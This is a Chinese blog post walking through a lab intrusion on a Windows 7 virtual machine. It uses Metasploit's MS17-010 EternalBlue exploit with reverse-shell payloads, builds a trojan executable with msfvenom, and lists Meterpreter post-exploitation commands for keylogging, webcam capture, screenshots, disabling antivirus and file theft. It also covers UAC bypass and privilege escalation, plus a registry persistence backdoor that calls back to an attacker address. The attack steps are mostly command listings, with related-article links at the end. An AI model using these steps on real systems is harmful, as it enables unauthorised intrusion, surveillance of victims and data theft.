MS17-010漏洞利用工具系统入侵(实测)shellcode

最新推荐文章于 2024-10-07 20:27:34 发布
最新推荐文章于 2024-10-07 20:27:34 发布
阅读量3.5k 收藏 9
点赞数 1
分类专栏: 网络安全 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42477843/article/details/106410186
版权

MS17-010漏洞利用工具系统入侵与ShellCode(实测)

文章目录

实验环境

角色系统ip
攻击者kali192.168.229.144
被攻击者Windows 7 Home Basic 7601 Service Pack 1 x64192.168.229.150

注意:win7必须安装以上版本一下且为更新漏洞的

第一步:安装环境

win7网址 itelltou

虚拟机

kali

第二步:测试两台虚拟机的互通性

win7 ping kali
在这里插入图片描述

kali ping win7

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MQCMtu2A-1590659137426)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528141102616.png)

第三步:关闭win7防护墙

控制面板->系统和安全->Windows 防火墙->打开或关闭win7防火墙

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Qb9XGsBM-1590659137430)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528141545810.png)

第三步:打开ms 并扫描被攻击机器

进入kali终端 输入msconsole打开ms

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7zUXBueB-1590659137433)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528142005649.png)

输入进入扫描模块

use auxiliary/scanner/smb/smb_ms17_010

注:基本ms命令

更新:msfupdate
帮助:msfconsole -h
启动msf: msfconsole
启动模块:use 模块路径

查看模块参数:show options
配置参数:set 参数名 参数值
运行:run

查看参数

image-20200528143458963.png

设置被攻击者ip

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZJWMUAIC-1590659137438)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528143543618.png)

run

image-20200528143613973.png

有+号代表扫描成功

攻击漏洞

use exploit/windows/smb/ms17_010_eternalblue
set rhost 被攻击者ip
set payload windows/x64/meterpreter/reverse_tcp
set lhost 攻击者ip
run

在这里插入图片描述

run

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-24paMkEr-1590659137441)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528144110008.png)

成功进入被攻击者命令行界面(非管理员权限)

image-20200528144216904.png

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UdDo1KGd-1590659137443)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528144250938.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-X9VrEWuQ-1590659137444)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528144323998.png)

至此攻击成功

任务二: ShellCode

第一步 制作控制木马

在kali中输入以下命令制作一个windows 木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者ip LPORT=1001 -f exe >cc.exe

第二步 将木马病毒发给被攻击机器

可运用各种手段,此处演示直接从kali本机拷贝到win7

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wJa7K66c-1590659137445)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528151849344.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ExIOZ6nn-1590659137446)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528151902306.png)

第三步:在kali中设置监听

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 攻击者ip
set LPORT 1001
run

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YvqBhE4T-1590659137447)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152100663.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AceHIPej-1590659137448)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152248328.png)

上图存在一个问题rhost应该为攻击者ip

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a7nGqSta-1590659137449)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152438121.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YlTTPyD9-1590659137450)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152457627.png)

第四部:测试

在win7中双击木马文件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uX67i6gu-1590659137452)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152833330.png)

然后在kali中查看[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Nl0oN9ha-1590659137453)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152813926.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PcyW7cG0-1590659137454)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152925907.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-P9vTeIvo-1590659137455)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152948746.png)

Metepreter

收集主机信息

获取系统运行的平台信息
sysinfo
shell -> systeminfo
查看权限 getuid
进入目标机cmd shell
进程相关
查看进程 ps
获取当前进程的pid getpid
切换进程 migrate 进程号
进程迁移:run post/windows/manage/migrate
关闭进程:
run killav
重启/关机 reboot / shutdown
摄像头相关
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-y4MuqCt2-1590659137457)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528153451777.png)

键盘记录

keyscan_start #开始键盘记录
keyscan_dump #导出记录数据
keyscan_stop #结束键盘记录
run post/windows/capture/keylog_recorder 记录键盘输入

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L9Zmf2as-1590659137458)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528153659368.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-V72uuWL3-1590659137459)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528153704884.png)

文件记录

getwd 或者pwd # 查看当前工作目录
cat # 查看文件内容
mkdir #只能在当前目录下创建文件夹
rmdir #只能删除当前目录下文件夹
rm #删除文件
edit #编辑或创建文件 没有的话,会新建文件
upload -r 本机路径 目的机路径# 上传文件到目标机上
download # 下载文件到本机上
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程
cmd.exe,-H不可见,-i交互

image-20200528153947324.png

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Pz3hq1wn-1590659137461)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528154015522.png)

文件上传

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oCJ0FM6b-1590659137462)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528171454763.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Enc2Dfr7-1590659137464)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528171524603.png)

进入cmd

shell

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GQjud0E3-1590659137465)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528162010028.png)

提权测试

方法一:getsystem提权失败

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qwMGVzvX-1590659137466)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528163831351.png)

方法二UAC****进行提权
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask

如使用bypassuac.rb脚本:

background
use exploit/windows/local/bypassuac
set SESSION session号码
run

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ICjzlDjb-1590659137467)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528164029623.png)

方法三 可先利用enum_patches模块 收集补丁信息,然后查找可用的exploits进行提权
meterpreter > run post/windows/gather/enum_patches #查看补丁信息
msf > use exploit/windows/local/ms13_053_schlamperei
msf > set SESSION 2
msf > exploit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tfUDAk5u-1590659137468)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528164635259.png)

远程桌面与截图

enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab
run vnc  #使用vnc远程桌面连接

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4TumzNQ2-1590659137469)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528165653809.png)

run vnc

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hHoOTCat-1590659137470)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528165745087.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-s4un8Muz-1590659137472)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528171735852.png)

这里真的很神奇,很开心!!!

后门植入

方法一 persistence****启动项后门

在C:\Users***\AppData\Local\Temp\目录下,上传一个vbs脚本 在注册表

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项

run persistence –h #查看帮助
run persistence -X -i 5 -p 6661 -r 192.168.0.133
#-X指定启动的方式为开机自启动,-i反向连接的时间间隔(5s) –r 指定攻击者的ip

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-543LlleW-1590659137473)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528173401397.png)

连接后门

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.0.133
msf > set LPORT 6661
msf > exploit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rjwBQ3KF-1590659137474)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528173419313.png)

指定攻击者的ip

[外链图片转存中...(img-543LlleW-1590659137473)].assets/image-20200528173401397.png)

连接后门

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.0.133
msf > set LPORT 6661
msf > exploit

[外链图片转存中...(img-rjwBQ3KF-1590659137474)].assets/image-20200528173419313.png)

笙烛
关注
专栏目录
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8749
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
热门推荐
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
Windows操作系统下的MS17_010漏洞利用
最新发布
Ypraise的博客
10-07 430
攻击者在正常或非正常连接时与目标靶机建立联系后,通过目标主机上的445端口msf漏洞,用kali直接控制。
渗透测试实战-漏洞利用MS17-010
09-26 514
渗透测试实战-漏洞利用MS17-010
探索永恒之蓝:MS17-010漏洞利用工具推荐
gitblog_00187的博客
09-14 409
探索永恒之蓝:MS17-010漏洞利用工具推荐 AutoBlue-MS17-010 项目地址: https://gitcode.com/gh_mirrors/au/AutoBlue-MS17-010 ...
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
记录学习
06-21 3931
msf永恒之蓝漏洞复现过程以及修复建议
MS17-010 漏洞利用
weixin_45095113的博客
12-13 1409
MS17-010 漏洞利用
利用NSA的MS17-010漏洞利用工具攻击Windows7
小晓晓晓林的博客
02-07 1828
0x01 Download NSA工具包 NSA工具包下载 攻击脚本需要32位的Python2.6环境,所以攻击机还需以下两个环境: python-2.6.6.msi、pywin32-221.win32-py2.6.exe 0x02 修改NSA工具配置文件 修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件 注释掉第72行代码#addplugins(fb, "ListeningPost", LP_DIR, .
MS12-020漏洞python利用代码.docx
11-25
### MS12-020 漏洞 Python 利用代码详解 #### 一、背景介绍 MS12-020 是微软在 2012 年发布的一个安全公告,该公告披露了一个针对远程桌面协议 (RDP) 的严重安全漏洞。此漏洞允许攻击者通过特制的 RDP 请求向目标...
Tryhackme - Blue (考点:blue MS17-010
冬萍子癸水
05-25 902
1 扫描 看名字就知道应该是blue漏洞 PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (wo
MS17-010批量漏洞扫描工具
07-18
windows环境下可以批量检测ms17-010漏洞的脆弱性的小工具
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
永恒之蓝检测工具MS17-010漏洞扫描工具
漏洞利用工具
09-29
1)对漏洞进行检索和排查; 2)对漏洞进行利用和修复。
ms_17_010漏洞利用
qq_46635165的博客
04-29 990
ms17_010漏洞利用复现 ms17_010漏洞原理 能力有限,请参见大佬的blog:https://blog.csdn.net/luoshenwei3533/article/details/82931999 环境准备 kali 作为攻击方 IP 10.1.1.1 win2003 作为受害方 IP 10.1.1.2 漏洞利用条件 win2003 开启了445端口(默认是开启的),未打漏洞补丁 win2003 关闭防火墙 二者能够相互ping通 简单的信息收集 1)假设攻击方目前不知道目标主机的端口,
ms17-010漏洞利用教程
weixin_30650859的博客
01-24 209
ms17-010 漏洞利用并拿下服务器教程 攻击环境: 攻击机win2003 ip:192.168.150.129 Window2003 Python环境及工具 攻击机kali: ip:192.168.150.128 目标主机window7 x64(未装smb 漏洞补丁) ip:192.168.150.131 演示操作 第一步:在攻击机Window20...
Metasploit -- MS17-010(永恒之蓝)漏洞利用
weixin_41489908的博客
05-14 1353
直到后来看到你恋爱的样子,才知道你从来没真正喜欢过我。。。。。 ---- 网易云热评 一、漏洞简介 MS17-010是一个安全类型的补丁,MS17-010更新修复了Microsoft Windows中的漏洞。 如果攻击者向Microsoft服务器消息块1.0(SMB v 1)服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 2017年, The Shadow Brokers决定公开一部分有价值的工具, 其中”eternal blue”(永恒之蓝) 就是其中之一(漏洞编号ms .
Windows MS17-010漏洞利用介绍
Dreamsi_zhang的博客
04-11 4213
利用metasploit开源安全漏洞检测工具实现漏洞检测及利用 1、metasploit介绍 ------Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 -...
ms17_010(永恒之蓝)漏洞利用
Sy0ung_的博客
11-19 1178
ms17_010(永恒之蓝)漏洞利用 1、MS17-010是什么 MS17-010漏洞利用模块就是利用Windows系统的Windows SMB远程执行代码漏洞, 向Microsoft服务器消息块(SMBv1)服务器发送经特殊设计的消息后,允许远程代码执行。 成功利用这些漏洞的攻击者即可获得在目标系统上执行代码的权利。 2、准备虚拟机win7 64位和kali 查看win7虚拟机IP: kali IP: 3、对win7进行端口扫描 使用kali的nmap工具进行扫描,在kali终端输入nmap –sS
kali利用ms17-010挂马
12-15
2. 下载ms17-010漏洞利用工具,可以从GitHub上下载: ```shell git clone https://github.com/worawit/MS17-010.git ``` 3. 进入MS17-010目录,运行以下命令编译漏洞利用工具: ```shell cd MS17-010 make `...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值